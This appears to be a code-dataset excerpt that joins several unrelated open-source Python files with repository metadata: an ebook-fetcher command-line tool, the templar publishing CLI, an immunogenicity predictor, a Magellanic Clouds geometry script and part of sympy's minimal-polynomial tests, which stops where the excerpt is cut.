but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with EeCon. If not, see <http://www.gnu.org/licenses/>.
"""
import argparse
from fetcher import fetcher as Fetcher
# ==============================================================================
# CONFIGURATION:
# ==============================================================================
WORKSPACE = "workspace/project_runeberg/"
VALID_DOMAINS = ("runeberg.org",)
# ==============================================================================
# FUNCTION:
# main()
# ==============================================================================
def main():
"""
DESCRIPTION:
PARAMETERS:
RETURN:
"""
# parse arguments
args = parse_command()
    # fetch and initialize the workspace
fetcher = Fetcher.Fetcher(WORKSPACE, VALID_DOMAINS, args)
# process the arguments
fetcher.process()
# ==============================================================================
# FUNCTION:
# parse_command()
# ==============================================================================
def parse_command():
"""
DESCRIPTION:
Parse the user-provided command using argparse.
PARAMETERS:
None
RETURN:
Dictionary of command line options
"""
print "[STATUS] parsing arguments... ",
# create an ArgumentParser
parser = argparse.ArgumentParser()
# positional arguments
parser.add_argument("--auto-markup", action="store_true",
help="Automatic conversion from HTML to XHTML (best effort)")
parser.add_argument("--auto-populate", action="store_true",
help="Automatic population from Project Runeberg Pages files")
parser.add_argument("--auto-utf8", action="store_true",
help="auto convert publication files to UTF-8")
parser.add_argument("--patch", help="apply pre-made git patch")
parser.add_argument("--source",
help="fetch a ebook archive URL or filename")
parser.add_argument("--title",
help="title of publication")
# parse the command into a ArgumentParser object
args = parser.parse_args()
print "ok."
# return a dict with command line options
return vars(args)
# ==============================================================================
# MODULE:
# __name__
# ==============================================================================
if __name__ == "__main__":
main()
| gpl-3.0 | 6,881,548,638,896,659,000 | 29.009524 | 80 | 0.535386 | false | 4.954403 | false | false | false |
albert12132/templar | templar/cli/templar.py | 1 | 2179 | """Command-line interface for templar."""
from templar.api import config
from templar.api import publish
from templar.exceptions import TemplarError
import templar
import argparse
import logging
import sys
LOGGING_FORMAT = '%(levelname)s %(filename)s:%(lineno)d> %(message)s'
logging.basicConfig(format=LOGGING_FORMAT)
log = logging.getLogger('templar')
def flags(args=None):
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--source',
help='Path to a source file with Markdown content.')
parser.add_argument('-t', '--template',
help='Path to a Jinja template file')
parser.add_argument('-d', '--destination',
help='Path to the destination file.')
parser.add_argument('-c', '--config', default='config.py',
help='Path to a Templar configuration file.')
parser.add_argument('--print', action='store_true',
help='Forces printing of result to stdout, '
'even if --destination is specified')
parser.add_argument('--debug', action='store_true',
help='Enable debugging messages.')
parser.add_argument('--version', action='store_true',
help='Print the version number and exit')
if args is not None:
return parser.parse_args(args)
return parser.parse_args()
def run(args):
if args.version:
print('Templar version {}'.format(templar.__version__))
exit(0)
log.setLevel(logging.DEBUG if args.debug else logging.ERROR)
try:
configuration = config.import_config(args.config)
result = publish.publish(
configuration,
source=args.source,
template=args.template,
destination=args.destination,
no_write=args.print)
except TemplarError as e:
if args.debug:
raise
else:
print('{}: {}'.format(type(e).__name__, str(e)), file=sys.stderr)
exit(1)
else:
if not args.destination or args.print:
print(result)
def main():
run(flags())
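# Example invocation (a sketch; the `templar` command name and the file names
# are assumptions -- any entry point that calls main() behaves the same):
#
#   templar -s content.md -t page.html -d build/index.html -c config.py
#   templar --source content.md --print --debug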
| mit | -8,073,542,425,977,757,000 | 33.046875 | 77 | 0.58972 | false | 4.446939 | true | false | false |
hammerlab/immuno | immuno/immunogenicity.py | 1 | 5849 | # Copyright (c) 2014. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from os import environ, listdir
from os.path import exists, split, join
from mhc_common import compact_hla_allele_name
from peptide_binding_measure import IC50_FIELD_NAME
DEFAULT_PEPTIDE_DIR = environ.get(
"IMMUNO_THYMIC_PEPTIDES",
join(split(__file__)[0], "thymic_peptides"))
THYMIC_DELETION_FIELD_NAME = 'ThymicDeletion'
def _load_allele_mapping_dict(path):
"""
Since some alleles have identical peptide sets as others, we compress
the stored data by only retaining one allele from each equivalence class
and using a mappings file to figure out which allele is retained.
"""
result = {}
with open(path, 'r') as f:
for line in f.read().split("\n"):
if len(line) > 0:
k, v = line.split("\t")
result[k] = v
return result
class ImmunogenicityPredictor(object):
"""
Predict whether some T-cell in a person's circulating repertoire could
recognize a particular pattern. The subset of the 'self' proteome which
binds to an individual's HLA alleles tells us which T-cells were removed
by negative selection. T-cells inspect peptides more strongly along
interior residues (positions 3-8), so we restrict our query only to those
positions.
"""
def __init__(
self,
alleles,
data_path = DEFAULT_PEPTIDE_DIR,
binding_threshold = 500,
first_position = 3,
last_position = 8):
"""
Parameters
--------
alleles : list of strings
data_path : str, optional
first_position : int, optional
Start position for extracting substring of
query peptide (indexed starting from 1)
last_position : int, optional
Last position for extracting substring of
query peptide (indexed starting from 1)
"""
self.binding_threshold = binding_threshold
self.first_position = first_position
self.last_position = last_position
self.alleles = {
compact_hla_allele_name(allele) for allele in alleles
}
self.data_path = data_path
assert exists(self.data_path), \
"Directory with thymic peptides (%s) does not exist" % \
self.data_path
available_alleles = listdir(self.data_path)
mappings_file_path = join(self.data_path, 'mappings')
if exists(mappings_file_path):
self.allele_mappings = \
_load_allele_mapping_dict(mappings_file_path)
else:
self.allele_mappings = \
dict(zip(available_alleles, available_alleles))
self.peptide_sets = {}
for allele in self.alleles:
if allele not in self.allele_mappings:
logging.warn(
"No MHC peptide set available for HLA allele %s", allele)
continue
else:
logging.info(
"Loading thymic MHC peptide set for HLA allele %s", allele)
filename = self.allele_mappings[allele]
assert filename in available_alleles, \
"No MHC peptide set available for HLA allele %s (file = %s)" % \
(allele,filename)
with open(join(self.data_path, filename), 'r') as f:
peptide_set = {l for l in f.read().split("\n") if len(l) > 0}
self.peptide_sets[allele] = peptide_set
def predict(self, peptides_df):
"""
Determine whether 9-mer peptide is immunogenic by checking
1) that the epitope binds strongly to a particular MHC allele
2) the "core" of the peptide (positions 3-8) don't overlap with any
other peptides in the self/thymic MHC ligand sets of that HLA allele
Returns DataFrame with two extra columns:
- ThymicDeletion: Was this epitope deleted during thymic selection
            (and thus can't be recognized by T-cells)?
- Immunogenic: Is this epitope a sufficiently strong binder that
wasn't deleted during thymic selection?
"""
thymic_peptide_sets = self.peptide_sets.values()
# assume a peptide is non-immunogenic unless not in thymic sets
# We do this in case some alleles are missing, resulting in all
# their associated ligands being considered non-immunogenic
peptides_df[THYMIC_DELETION_FIELD_NAME] = True
for i in xrange(len(peptides_df)):
row = peptides_df.ix[i]
peptide = row.Epitope
allele = compact_hla_allele_name(row.Allele)
if allele in self.peptide_sets:
# positions in the epitope are indexed starting from 1 to
# match immunology nomenclature
substring = \
peptide[self.first_position - 1 : self.last_position]
peptides_df[THYMIC_DELETION_FIELD_NAME].ix[i] = \
substring in self.peptide_sets[allele]
peptides_df["Immunogenic"] = \
~peptides_df[THYMIC_DELETION_FIELD_NAME] & \
(peptides_df[IC50_FIELD_NAME] <= self.binding_threshold)
return peptides_df
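# Illustrative usage (a hedged sketch; the allele names and `peptides_df` are
# assumptions -- the frame needs Epitope, Allele and the IC50 column used
# above, as produced elsewhere in this package):
#
#   predictor = ImmunogenicityPredictor(
#       alleles=["HLA-A*02:01", "HLA-B*07:02"])
#   annotated = predictor.predict(peptides_df)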
| apache-2.0 | -1,123,639,031,035,863,000 | 35.786164 | 80 | 0.618396 | false | 3.83541 | false | false | false |
Gabriel-p/mcs_rot_angles | aux_modules/validation_set.py | 1 | 10176 |
import os
from astropy.io import ascii
from astropy.table import Table
from astropy.coordinates import Distance, Angle, SkyCoord
from astropy import units as u
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import sys
# Change path so that we can import functions from the 'modules/' folder.
sys.path.insert(0, sys.path[0].replace('aux_', ''))
import readData
import MCs_data
def zDist(N):
"""
This function generates a uniform spread of vertical distances, in the
range (-z_dist, +z_dist).
"""
# Define maximum vertical distance (in parsec)
z_dist = 5000.
# Generate N random z' vertical distances, in parsec.
# To generate the *same* values each time the code is executed, fix the
# random seed to any integer value.
# np.random.seed(12345)
z_prime = np.random.uniform(-z_dist, z_dist, N)
return z_prime
def invertDist(incl, theta, ra_0, dec_0, D_0, ra, dec, z_prime):
"""
Inverted distance in parsecs (D) from Eq (7) in
van der Marel & Cioni (2001) using Eqs (1), (2), (3).
"""
# Express everything in radians.
incl, theta = np.deg2rad(incl), np.deg2rad(theta)
ra_0, dec_0, ra, dec = ra_0.rad, dec_0.rad, np.deg2rad(ra), np.deg2rad(dec)
# cos(rho)
A = np.cos(dec) * np.cos(dec_0) * np.cos(ra - ra_0) +\
np.sin(dec) * np.sin(dec_0)
# sin(rho) * cos(phi)
B = -np.cos(dec) * np.sin(ra - ra_0)
# sin(rho) * sin(phi)
C = np.sin(dec) * np.cos(dec_0) -\
np.cos(dec) * np.sin(dec_0) * np.cos(ra - ra_0)
# Eq (7)
D = (z_prime - D_0.value * np.cos(incl)) /\
(np.sin(incl) * (C * np.cos(theta) - B * np.sin(theta)) -
A * np.cos(incl))
return D
def rho_phi(ra, dec, glx_ctr):
"""
Obtain the angular distance between (ra, dec) coordinates and the center
of the galaxy (rho), and its position angle (phi).
"""
# Store clusters' (ra, dec) coordinates in degrees.
coords = SkyCoord(list(zip(*[ra, dec])), unit=(u.deg, u.deg))
rho = coords.separation(glx_ctr)
# Position angle between center and coordinates. This is the angle between
# the positive y axis (North) counter-clockwise towards the negative x
# axis (East).
Phi = glx_ctr.position_angle(coords)
# This is the angle measured counter-clockwise from the x positive axis
# (West).
phi = Phi + Angle('90d')
return rho, phi
def xyz_coords(rho, phi, D_0, r_dist):
'''
Obtain coordinates in the (x,y,z) system of van der Marel & Cioni (2001),
Eq (5).
Values (x, y,z) returned in Kpc.
'''
d_kpc = Distance((10**(0.2 * (np.asarray(r_dist) + 5.))) / 1000.,
unit=u.kpc)
x = d_kpc * np.sin(rho.radian) * np.cos(phi.radian)
y = d_kpc * np.sin(rho.radian) * np.sin(phi.radian)
z = D_0.kpc * u.kpc - d_kpc * np.cos(rho.radian)
x, y, z = x.value, y.value, z.value
return np.array([x, y, z])
def outData(gal, gal_data, dist_mod, e_dm):
"""
Write data to output 'xxx_input_synth.dat' file ('xxx' stands for the
processed galaxy.)
"""
data = Table(
[gal_data['Name'], gal_data['ra'], gal_data['dec'], dist_mod, e_dm,
gal_data['log(age)']],
names=['Name', 'ra', 'dec', 'dist_mod', 'e_dm', 'log(age)'])
with open(gal.lower() + "_input_synth.dat", 'w') as f:
ascii.write(data, f, format='fixed_width', delimiter=' ')
def inv_trans_eqs(x_p, y_p, z_p, theta, inc):
"""
Inverse set of equations. Transform inclined plane system (x',y',z')
into face on sky system (x,y,z).
"""
x = x_p * np.cos(theta) - y_p * np.cos(inc) * np.sin(theta) -\
z_p * np.sin(inc) * np.sin(theta)
y = x_p * np.sin(theta) + y_p * np.cos(inc) * np.cos(theta) +\
z_p * np.sin(inc) * np.cos(theta)
z = -1. * y_p * np.sin(inc) + z_p * np.cos(inc)
return x, y, z
def make_plot(gal_name, incl, theta, cl_xyz, dm):
"""
Original link for plotting intersecting planes:
http://stackoverflow.com/a/14825951/1391441
"""
# Make plot.
fig = plt.figure()
ax = Axes3D(fig)
# Placement 0, 0 is the bottom left, 1, 1 is the top right.
ax.text2D(
0.4, 0.95, r"${}:\;(\Theta, i) = ({}, {})$".format(
gal_name, theta - 90., incl),
transform=ax.transAxes, fontsize=15, color='red')
# Express in radians for calculations.
incl, theta = np.deg2rad(incl), np.deg2rad(theta)
# Plot clusters.
x_cl, y_cl, z_cl = cl_xyz
SC = ax.scatter(x_cl, z_cl, y_cl, c=dm, s=50)
min_X, max_X = min(x_cl) - 2., max(x_cl) + 2.
min_Y, max_Y = min(y_cl) - 2., max(y_cl) + 2.
min_Z, max_Z = min(z_cl) - 2., max(z_cl) + 2.
# x,y plane.
X, Y = np.meshgrid([min_X, max_X], [min_Y, max_Y])
Z = np.zeros((2, 2))
# Plot x,y plane.
ax.plot_surface(X, Z, Y, color='gray', alpha=.1, linewidth=0, zorder=1)
# Axis of x,y plane.
# x axis.
ax.plot([min_X, max_X], [0., 0.], [0., 0.], ls='--', c='k', zorder=4)
# Arrow head pointing in the positive x direction.
ax.quiver(max_X, 0., 0., max_X, 0., 0., arrow_length_ratio=.5,
length=.1, color='k')
ax.text(max_X, 0., -.5, 'x', 'x')
# y axis.
ax.plot([0., 0.], [0., 0.], [0., max_Y], ls='--', c='k')
# Arrow head pointing in the positive y direction.
ax.quiver(0., 0., max_Y, 0., 0., max_Y, arrow_length_ratio=.8,
length=.1, color='k')
ax.plot([0., 0.], [0., 0.], [min_Y, 0.], ls='--', c='k')
ax.text(-.5, 0., max_Y, 'y', 'y')
#
# A plane is a*x+b*y+c*z+d=0, [a,b,c] is the normal.
a, b, c, d = -1. * np.sin(theta) * np.sin(incl),\
np.cos(theta) * np.sin(incl), np.cos(incl), 0.
# print('a/c,b/c,1,d/c:', a / c, b / c, 1., d / c)
# Rotated plane.
X2_t, Y2_t = np.meshgrid([min_X, max_X], [0, max_Y])
Z2_t = (-a * X2_t - b * Y2_t) / c
X2_b, Y2_b = np.meshgrid([min_X, max_X], [min_Y, 0])
Z2_b = (-a * X2_b - b * Y2_b) / c
# Top half of first x',y' inclined plane.
ax.plot_surface(X2_t, Z2_t, Y2_t, color='red', alpha=.1, lw=0, zorder=3)
# Bottom half of inclined plane.
ax.plot_surface(X2_t, Z2_b, Y2_b, color='red', alpha=.1, lw=0, zorder=-1)
# Axis of x',y' plane.
# x' axis.
x_min, y_min, z_min = inv_trans_eqs(min_X, 0., 0., theta, incl)
x_max, y_max, z_max = inv_trans_eqs(max_X, 0., 0., theta, incl)
ax.plot([x_min, x_max], [z_min, z_max], [y_min, y_max], ls='--', c='b')
# Arrow head pointing in the positive x' direction.
ax.quiver(x_max, z_max, y_max, x_max, z_max, y_max, length=0.1,
arrow_length_ratio=.7)
ax.text(x_max, z_max, y_max - .5, "x'", 'x', color='b')
# y' axis.
x_min, y_min, z_min = inv_trans_eqs(0., min_Y, 0., theta, incl)
x_max, y_max, z_max = inv_trans_eqs(0., max_Y, 0., theta, incl)
ax.plot([x_min, x_max], [z_min, z_max], [y_min, y_max], ls='--', c='g')
# Arrow head pointing in the positive y' direction.
ax.quiver(x_max, z_max, y_max, x_max, z_max, y_max, length=0.1,
arrow_length_ratio=.9, color='g')
ax.text(x_max - .5, z_max, y_max, "y'", 'y', color='g')
# # z' axis.
# x_min, y_min, z_min = inv_trans_eqs(0., 0, min_Z, theta, incl)
# x_max, y_max, z_max = inv_trans_eqs(0., 0, max_Z, theta, incl)
# ax.plot([x_min, x_max], [z_min, z_max], [y_min, y_max], ls='--', c='y')
# # Arrow head pointing in the positive z' direction.
# ax.quiver(x_max, z_max, y_max, x_max, z_max, y_max, length=0.1,
# arrow_length_ratio=.9, color='y')
# ax.text(x_max - .5, z_max, y_max, "z'", 'z', color='y')
ax.set_xlabel('x (Kpc)')
ax.set_ylabel('z (Kpc)')
ax.set_ylim(max_Y, min_Y)
ax.set_zlabel('y (Kpc)')
plt.colorbar(SC, shrink=0.9, aspect=25)
ax.axis('equal')
ax.axis('tight')
# This controls the initial orientation of the displayed 3D plot.
    # 'elev' stores the elevation angle in the z plane. 'azim' stores the
    # azimuth angle in the x,y plane.
ax.view_init(elev=0., azim=-90.)
plt.show()
# plt.savefig()
def main():
"""
"""
# Define inclination angles (i, Theta) (SMC first, LMC second).
# 'Theta' is the PA (position angle) measured from the North (positive
# y axis in van der Marel et al. 2002, Fig 3)
rot_angles = ((60, 150.), (30, 140.))
# Root path.
r_path = os.path.realpath(__file__)[:-30]
# Read input data for both galaxies from file (smc_data, lmc_data)
gal_data = readData.main(r_path)
for gal, gal_name in enumerate(['SMC', 'LMC']):
print("Generating data for {}".format(gal_name))
incl, Theta = rot_angles[gal]
# 'theta' is the position angle measured from the West (positive
# x axis), used by Eq (7) in van der Marel & Cioni (2001).
theta = Theta + 90.
# Center coordinates and distance for this galaxy.
gal_center, D_0, e_gal_dist = MCs_data.MCs_data(gal)
ra_0, dec_0 = gal_center.ra, gal_center.dec
# Center coordinates for observed clusters in this galaxy.
ra, dec = gal_data[gal]['ra'], gal_data[gal]['dec']
# Generate N random vertical distances (z'), in parsec.
z_prime = zDist(len(ra))
# Distance to clusters in parsecs.
D = invertDist(incl, theta, ra_0, dec_0, D_0, ra, dec, z_prime)
# Convert to distance moduli.
dist_mod = np.round(-5. + 5. * np.log10(D), 2)
# This line below uses the actual distance moduli found by ASteCA.
# dist_mod = gal_data[gal]['dist_mod']
# Random errors for distance moduli.
e_dm = np.round(np.random.uniform(.03, .09, len(ra)), 2)
# Store data in output file.
outData(gal_name, gal_data[gal], dist_mod, e_dm)
print("Output data stored")
# Obtain angular projected distance and position angle for the
# clusters in the galaxy.
rho, phi = rho_phi(ra, dec, gal_center)
cl_xyz = xyz_coords(rho, phi, D_0, dist_mod)
make_plot(gal_name, incl, theta, cl_xyz, dist_mod)
print("Plot saved.")
if __name__ == '__main__':
main()
| gpl-3.0 | -6,003,738,110,879,360,000 | 34.552448 | 79 | 0.564123 | false | 2.680728 | false | false | false |
wxgeo/geophar | wxgeometrie/sympy/polys/tests/test_numberfields.py | 4 | 28618 | """Tests for computational algebraic number field theory. """
from sympy import (S, Rational, Symbol, Poly, sqrt, I, oo, Tuple, expand,
pi, cos, sin, exp)
from sympy.utilities.pytest import raises, slow
from sympy.core.compatibility import range
from sympy.polys.numberfields import (
minimal_polynomial,
primitive_element,
is_isomorphism_possible,
field_isomorphism_pslq,
field_isomorphism,
to_number_field,
AlgebraicNumber,
isolate, IntervalPrinter,
)
from sympy.polys.polyerrors import (
IsomorphismFailed,
NotAlgebraic,
GeneratorsError,
)
from sympy.polys.polyclasses import DMP
from sympy.polys.domains import QQ
from sympy.polys.rootoftools import rootof
from sympy.polys.polytools import degree
from sympy.abc import x, y, z
Q = Rational
def test_minimal_polynomial():
assert minimal_polynomial(-7, x) == x + 7
assert minimal_polynomial(-1, x) == x + 1
assert minimal_polynomial( 0, x) == x
assert minimal_polynomial( 1, x) == x - 1
assert minimal_polynomial( 7, x) == x - 7
assert minimal_polynomial(sqrt(2), x) == x**2 - 2
assert minimal_polynomial(sqrt(5), x) == x**2 - 5
assert minimal_polynomial(sqrt(6), x) == x**2 - 6
assert minimal_polynomial(2*sqrt(2), x) == x**2 - 8
assert minimal_polynomial(3*sqrt(5), x) == x**2 - 45
assert minimal_polynomial(4*sqrt(6), x) == x**2 - 96
assert minimal_polynomial(2*sqrt(2) + 3, x) == x**2 - 6*x + 1
assert minimal_polynomial(3*sqrt(5) + 6, x) == x**2 - 12*x - 9
assert minimal_polynomial(4*sqrt(6) + 7, x) == x**2 - 14*x - 47
assert minimal_polynomial(2*sqrt(2) - 3, x) == x**2 + 6*x + 1
assert minimal_polynomial(3*sqrt(5) - 6, x) == x**2 + 12*x - 9
assert minimal_polynomial(4*sqrt(6) - 7, x) == x**2 + 14*x - 47
assert minimal_polynomial(sqrt(1 + sqrt(6)), x) == x**4 - 2*x**2 - 5
assert minimal_polynomial(sqrt(I + sqrt(6)), x) == x**8 - 10*x**4 + 49
assert minimal_polynomial(2*I + sqrt(2 + I), x) == x**4 + 4*x**2 + 8*x + 37
assert minimal_polynomial(sqrt(2) + sqrt(3), x) == x**4 - 10*x**2 + 1
assert minimal_polynomial(
sqrt(2) + sqrt(3) + sqrt(6), x) == x**4 - 22*x**2 - 48*x - 23
a = 1 - 9*sqrt(2) + 7*sqrt(3)
assert minimal_polynomial(
1/a, x) == 392*x**4 - 1232*x**3 + 612*x**2 + 4*x - 1
assert minimal_polynomial(
1/sqrt(a), x) == 392*x**8 - 1232*x**6 + 612*x**4 + 4*x**2 - 1
raises(NotAlgebraic, lambda: minimal_polynomial(oo, x))
raises(NotAlgebraic, lambda: minimal_polynomial(2**y, x))
raises(NotAlgebraic, lambda: minimal_polynomial(sin(1), x))
assert minimal_polynomial(sqrt(2)).dummy_eq(x**2 - 2)
assert minimal_polynomial(sqrt(2), x) == x**2 - 2
assert minimal_polynomial(sqrt(2), polys=True) == Poly(x**2 - 2)
assert minimal_polynomial(sqrt(2), x, polys=True) == Poly(x**2 - 2)
assert minimal_polynomial(sqrt(2), x, polys=True, compose=False) == Poly(x**2 - 2)
a = AlgebraicNumber(sqrt(2))
b = AlgebraicNumber(sqrt(3))
assert minimal_polynomial(a, x) == x**2 - 2
assert minimal_polynomial(b, x) == x**2 - 3
assert minimal_polynomial(a, x, polys=True) == Poly(x**2 - 2)
assert minimal_polynomial(b, x, polys=True) == Poly(x**2 - 3)
assert minimal_polynomial(sqrt(a/2 + 17), x) == 2*x**4 - 68*x**2 + 577
assert minimal_polynomial(sqrt(b/2 + 17), x) == 4*x**4 - 136*x**2 + 1153
a, b = sqrt(2)/3 + 7, AlgebraicNumber(sqrt(2)/3 + 7)
f = 81*x**8 - 2268*x**6 - 4536*x**5 + 22644*x**4 + 63216*x**3 - \
31608*x**2 - 189648*x + 141358
assert minimal_polynomial(sqrt(a) + sqrt(sqrt(a)), x) == f
assert minimal_polynomial(sqrt(b) + sqrt(sqrt(b)), x) == f
assert minimal_polynomial(
a**Q(3, 2), x) == 729*x**4 - 506898*x**2 + 84604519
# issue 5994
eq = S('''
-1/(800*sqrt(-1/240 + 1/(18000*(-1/17280000 +
sqrt(15)*I/28800000)**(1/3)) + 2*(-1/17280000 +
sqrt(15)*I/28800000)**(1/3)))''')
assert minimal_polynomial(eq, x) == 8000*x**2 - 1
ex = 1 + sqrt(2) + sqrt(3)
mp = minimal_polynomial(ex, x)
assert mp == x**4 - 4*x**3 - 4*x**2 + 16*x - 8
ex = 1/(1 + sqrt(2) + sqrt(3))
mp = minimal_polynomial(ex, x)
assert mp == 8*x**4 - 16*x**3 + 4*x**2 + 4*x - 1
p = (expand((1 + sqrt(2) - 2*sqrt(3) + sqrt(7))**3))**Rational(1, 3)
mp = minimal_polynomial(p, x)
assert mp == x**8 - 8*x**7 - 56*x**6 + 448*x**5 + 480*x**4 - 5056*x**3 + 1984*x**2 + 7424*x - 3008
p = expand((1 + sqrt(2) - 2*sqrt(3) + sqrt(7))**3)
mp = minimal_polynomial(p, x)
assert mp == x**8 - 512*x**7 - 118208*x**6 + 31131136*x**5 + 647362560*x**4 - 56026611712*x**3 + 116994310144*x**2 + 404854931456*x - 27216576512
assert minimal_polynomial(S("-sqrt(5)/2 - 1/2 + (-sqrt(5)/2 - 1/2)**2"), x) == x - 1
a = 1 + sqrt(2)
assert minimal_polynomial((a*sqrt(2) + a)**3, x) == x**2 - 198*x + 1
p = 1/(1 + sqrt(2) + sqrt(3))
assert minimal_polynomial(p, x, compose=False) == 8*x**4 - 16*x**3 + 4*x**2 + 4*x - 1
p = 2/(1 + sqrt(2) + sqrt(3))
assert minimal_polynomial(p, x, compose=False) == x**4 - 4*x**3 + 2*x**2 + 4*x - 2
assert minimal_polynomial(1 + sqrt(2)*I, x, compose=False) == x**2 - 2*x + 3
assert minimal_polynomial(1/(1 + sqrt(2)) + 1, x, compose=False) == x**2 - 2
assert minimal_polynomial(sqrt(2)*I + I*(1 + sqrt(2)), x,
compose=False) == x**4 + 18*x**2 + 49
# minimal polynomial of I
assert minimal_polynomial(I, x, domain=QQ.algebraic_field(I)) == x - I
K = QQ.algebraic_field(I*(sqrt(2) + 1))
assert minimal_polynomial(I, x, domain=K) == x - I
assert minimal_polynomial(I, x, domain=QQ) == x**2 + 1
assert minimal_polynomial(I, x, domain='QQ(y)') == x**2 + 1
def test_minimal_polynomial_hi_prec():
p = 1/sqrt(1 - 9*sqrt(2) + 7*sqrt(3) + S(1)/10**30)
mp = minimal_polynomial(p, x)
# checked with Wolfram Alpha
assert mp.coeff(x**6) == -1232000000000000000000000000001223999999999999999999999999999987999999999999999999999999999996000000000000000000000000000000
def test_minimal_polynomial_sq():
from sympy import Add, expand_multinomial
p = expand_multinomial((1 + 5*sqrt(2) + 2*sqrt(3))**3)
mp = minimal_polynomial(p**Rational(1, 3), x)
assert mp == x**4 - 4*x**3 - 118*x**2 + 244*x + 1321
p = expand_multinomial((1 + sqrt(2) - 2*sqrt(3) + sqrt(7))**3)
mp = minimal_polynomial(p**Rational(1, 3), x)
assert mp == x**8 - 8*x**7 - 56*x**6 + 448*x**5 + 480*x**4 - 5056*x**3 + 1984*x**2 + 7424*x - 3008
p = Add(*[sqrt(i) for i in range(1, 12)])
mp = minimal_polynomial(p, x)
assert mp.subs({x: 0}) == -71965773323122507776
def test_minpoly_compose():
# issue 6868
eq = S('''
-1/(800*sqrt(-1/240 + 1/(18000*(-1/17280000 +
sqrt(15)*I/28800000)**(1/3)) + 2*(-1/17280000 +
sqrt(15)*I/28800000)**(1/3)))''')
mp = minimal_polynomial(eq + 3, x)
assert mp == 8000*x**2 - 48000*x + 71999
# issue 5888
assert minimal_polynomial(exp(I*pi/8), x) == x**8 + 1
mp = minimal_polynomial(sin(pi/7) + sqrt(2), x)
assert mp == 4096*x**12 - 63488*x**10 + 351488*x**8 - 826496*x**6 + \
770912*x**4 - 268432*x**2 + 28561
mp = minimal_polynomial(cos(pi/7) + sqrt(2), x)
assert mp == 64*x**6 - 64*x**5 - 432*x**4 + 304*x**3 + 712*x**2 - \
232*x - 239
mp = minimal_polynomial(exp(I*pi/7) + sqrt(2), x)
assert mp == x**12 - 2*x**11 - 9*x**10 + 16*x**9 + 43*x**8 - 70*x**7 - 97*x**6 + 126*x**5 + 211*x**4 - 212*x**3 - 37*x**2 + 142*x + 127
mp = minimal_polynomial(sin(pi/7) + sqrt(2), x)
assert mp == 4096*x**12 - 63488*x**10 + 351488*x**8 - 826496*x**6 + \
770912*x**4 - 268432*x**2 + 28561
mp = minimal_polynomial(cos(pi/7) + sqrt(2), x)
assert mp == 64*x**6 - 64*x**5 - 432*x**4 + 304*x**3 + 712*x**2 - \
232*x - 239
mp = minimal_polynomial(exp(I*pi/7) + sqrt(2), x)
assert mp == x**12 - 2*x**11 - 9*x**10 + 16*x**9 + 43*x**8 - 70*x**7 - 97*x**6 + 126*x**5 + 211*x**4 - 212*x**3 - 37*x**2 + 142*x + 127
mp = minimal_polynomial(exp(2*I*pi/7), x)
assert mp == x**6 + x**5 + x**4 + x**3 + x**2 + x + 1
mp = minimal_polynomial(exp(2*I*pi/15), x)
assert mp == x**8 - x**7 + x**5 - x**4 + x**3 - x + 1
mp = minimal_polynomial(cos(2*pi/7), x)
assert mp == 8*x**3 + 4*x**2 - 4*x - 1
    mp = minimal_polynomial(sin(2*pi/7), x)
    assert mp == 64*x**6 - 112*x**4 + 56*x**2 - 7
ex = (5*cos(2*pi/7) - 7)/(9*cos(pi/7) - 5*cos(3*pi/7))
mp = minimal_polynomial(ex, x)
assert mp == x**3 + 2*x**2 - x - 1
assert minimal_polynomial(-1/(2*cos(pi/7)), x) == x**3 + 2*x**2 - x - 1
assert minimal_polynomial(sin(2*pi/15), x) == \
256*x**8 - 448*x**6 + 224*x**4 - 32*x**2 + 1
assert minimal_polynomial(sin(5*pi/14), x) == 8*x**3 - 4*x**2 - 4*x + 1
assert minimal_polynomial(cos(pi/15), x) == 16*x**4 + 8*x**3 - 16*x**2 - 8*x + 1
ex = rootof(x**3 +x*4 + 1, 0)
mp = minimal_polynomial(ex, x)
assert mp == x**3 + 4*x + 1
mp = minimal_polynomial(ex + 1, x)
assert mp == x**3 - 3*x**2 + 7*x - 4
assert minimal_polynomial(exp(I*pi/3), x) == x**2 - x + 1
assert minimal_polynomial(exp(I*pi/4), x) == x**4 + 1
assert minimal_polynomial(exp(I*pi/6), x) == x**4 - x**2 + 1
assert minimal_polynomial(exp(I*pi/9), x) == x**6 - x**3 + 1
assert minimal_polynomial(exp(I*pi/10), x) == x**8 - x**6 + x**4 - x**2 + 1
assert minimal_polynomial(sin(pi/9), x) == 64*x**6 - 96*x**4 + 36*x**2 - 3
assert minimal_polynomial(sin(pi/11), x) == 1024*x**10 - 2816*x**8 + \
2816*x**6 - 1232*x**4 + 220*x**2 - 11
ex = 2**Rational(1, 3)*exp(Rational(2, 3)*I*pi)
assert minimal_polynomial(ex, x) == x**3 - 2
raises(NotAlgebraic, lambda: minimal_polynomial(cos(pi*sqrt(2)), x))
raises(NotAlgebraic, lambda: minimal_polynomial(sin(pi*sqrt(2)), x))
raises(NotAlgebraic, lambda: minimal_polynomial(exp(I*pi*sqrt(2)), x))
# issue 5934
ex = 1/(-36000 - 7200*sqrt(5) + (12*sqrt(10)*sqrt(sqrt(5) + 5) +
24*sqrt(10)*sqrt(-sqrt(5) + 5))**2) + 1
raises(ZeroDivisionError, lambda: minimal_polynomial(ex, x))
ex = sqrt(1 + 2**Rational(1,3)) + sqrt(1 + 2**Rational(1,4)) + sqrt(2)
mp = minimal_polynomial(ex, x)
assert degree(mp) == 48 and mp.subs({x:0}) == -16630256576
def test_minpoly_issue_7113():
# see discussion in https://github.com/sympy/sympy/pull/2234
from sympy.simplify.simplify import nsimplify
r = nsimplify(pi, tolerance=0.000000001)
mp = minimal_polynomial(r, x)
assert mp == 1768292677839237920489538677417507171630859375*x**109 - \
2734577732179183863586489182929671773182898498218854181690460140337930774573792597743853652058046464
def test_minpoly_issue_7574():
ex = -(-1)**Rational(1, 3) + (-1)**Rational(2,3)
assert minimal_polynomial(ex, x) == x + 1
def test_primitive_element():
